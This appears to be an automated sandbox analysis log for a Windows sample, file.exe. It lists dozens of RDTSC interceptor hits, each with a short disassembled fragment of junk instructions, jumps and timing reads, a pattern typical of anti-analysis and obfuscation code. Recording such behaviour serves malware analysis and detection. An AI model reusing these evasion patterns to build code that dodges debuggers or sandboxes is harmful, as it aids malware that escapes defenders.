Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF0E1 second address: 4CF0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF0E5 second address: 4CF119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F5955614998h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F59556149A6h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007F5955614998h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF119 second address: 4CF123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F5954CE94A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF123 second address: 4CF13F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F595561499Fh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF332 second address: 4CF33C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5954CE94ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF3D4 second address: 4CF3D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF4B6 second address: 4CF4BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF4BA second address: 4CF4C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF4C0 second address: 4CF501 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5954CE94ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 69A4DBB0h 0x00000011 jnc 00007F5954CE94ACh 0x00000017 lea ebx, dword ptr [ebp+12455F0Dh] 0x0000001d jmp 00007F5954CE94B2h 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4CF501 second address: 4CF505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4E1730 second address: 4E1734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EDA82 second address: 4EDAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5955614996h 0x0000000a jmp 00007F59556149A1h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EDAA1 second address: 4EDAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5954CE94A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EDAAB second address: 4EDABB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4EDABB second address: 4EDAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDAC1 second address: 4EDAC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDAC5 second address: 4EDACB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDACB second address: 4EDAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDEB0 second address: 4EDEB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDEB4 second address: 4EDF05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A8h 0x00000007 jc 00007F5955614996h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 pushad 0x00000011 jmp 00007F59556149A8h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F595561499Dh 0x0000001d jnl 00007F5955614996h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDF05 second address: 4EDF09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDF09 second address: 4EDF0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE1FF second address: 4EE205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE205 second address: 4EE222 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5955614996h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F595561499Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE7A9 second address: 4EE7AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE7AF second address: 4EE7B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE7B5 second address: 4EE7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE7B9 second address: 4EE7BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E2CF4 second address: 4E2CFE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EEBFD second address: 4EEC01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EEC01 second address: 4EEC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5954CE94AEh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EEC1B second address: 4EEC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EEC1F second address: 4EEC29 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF838 second address: 4EF842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5955614996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF842 second address: 4EF855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94AFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF855 second address: 4EF85B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F49A7 second address: 4F49AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F49AD second address: 4F49E4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F59556149A3h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d js 00007F59556149B1h 0x00000013 pushad 0x00000014 jmp 00007F59556149A3h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3140 second address: 4F3144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4B07 second address: 4F4B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7A9E second address: 4F7AA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD578 second address: 4FD582 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FCA0B second address: 4FCA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FCA0F second address: 4FCA13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FCB5F second address: 4FCB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FCB68 second address: 4FCB6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD124 second address: 4FD12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD275 second address: 4FD281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 ja 00007F5955614996h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD3E9 second address: 4FD3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD3ED second address: 4FD401 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5955614996h 0x00000008 jc 00007F5955614996h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD401 second address: 4FD405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD405 second address: 4FD41C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a jmp 00007F595561499Ah 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF25B second address: 4FF264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF300 second address: 4FF337 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 jg 00007F595561499Ch 0x00000016 pop eax 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F59556149A6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFE13 second address: 4FFE17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFE17 second address: 4FFE25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F595561499Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFEE1 second address: 4FFEE7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FFFA1 second address: 4FFFB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500193 second address: 500197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5004B0 second address: 5004B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500A6A second address: 500AFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F5954CE94A8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 mov esi, 67CD75C5h 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F5954CE94A8h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 mov dword ptr [ebp+122D2144h], ebx 0x0000004e push 00000000h 0x00000050 mov di, 2B5Ch 0x00000054 and si, F531h 0x00000059 xchg eax, ebx 0x0000005a pushad 0x0000005b jbe 00007F5954CE94A8h 0x00000061 pushad 0x00000062 popad 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F5954CE94B3h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500AFD second address: 500B26 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F59556149ABh 0x00000014 jmp 00007F59556149A5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 501624 second address: 50162B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5047F7 second address: 504819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F595561499Bh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F595561499Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5052EF second address: 505306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jnp 00007F5954CE94A6h 0x00000010 jc 00007F5954CE94A6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505EC6 second address: 505ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505ECC second address: 505EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F5954CE94B0h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505EE3 second address: 505EE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506967 second address: 506981 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509E8F second address: 509E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509E93 second address: 509EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5954CE94AFh 0x00000012 pop edx 0x00000013 nop 0x00000014 mov ebx, dword ptr [ebp+122D26E3h] 0x0000001a push 00000000h 0x0000001c sub di, E1D9h 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007F5954CE94A8h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 0000001Ch 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d movzx ebx, bx 0x00000040 xchg eax, esi 0x00000041 push eax 0x00000042 push edx 0x00000043 push ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509EED second address: 509EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E40B second address: 50E411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51257A second address: 512581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512581 second address: 5125C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a sbb ebx, 1D9AECEFh 0x00000010 push 00000000h 0x00000012 mov ebx, 1A069B15h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F5954CE94A8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5146C8 second address: 5146DA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5146DA second address: 5146DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506733 second address: 50675A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F5955614998h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5146DE second address: 5146E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5158D8 second address: 515905 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F595561499Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b ja 00007F595561499Ch 0x00000011 pushad 0x00000012 jmp 00007F595561499Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515905 second address: 515950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 mov bl, 6Bh 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F5954CE94A8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 sub edi, 0B74487Dh 0x0000002d xchg eax, esi 0x0000002e push ecx 0x0000002f push eax 0x00000030 jp 00007F5954CE94A6h 0x00000036 pop eax 0x00000037 pop ecx 0x00000038 push eax 0x00000039 push esi 0x0000003a push eax 0x0000003b push edx 0x0000003c jg 00007F5954CE94A6h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51695C second address: 516961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 516961 second address: 516978 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5954CE94A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007F5954CE94B0h 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B11C8 second address: 4B11D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B11D1 second address: 4B11DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B11DA second address: 4B11DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B11DE second address: 4B11E8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5954CE94A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5223CB second address: 5223E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5223E7 second address: 5223EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5223EB second address: 5223F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5223F7 second address: 5223FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5223FD second address: 522401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522401 second address: 52240B instructions: 0x00000000 rdtsc 0x00000002 js 00007F5954CE94A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF743 second address: 4AF764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF764 second address: 4AF771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F5954CE94A6h 0x0000000d rdtsc
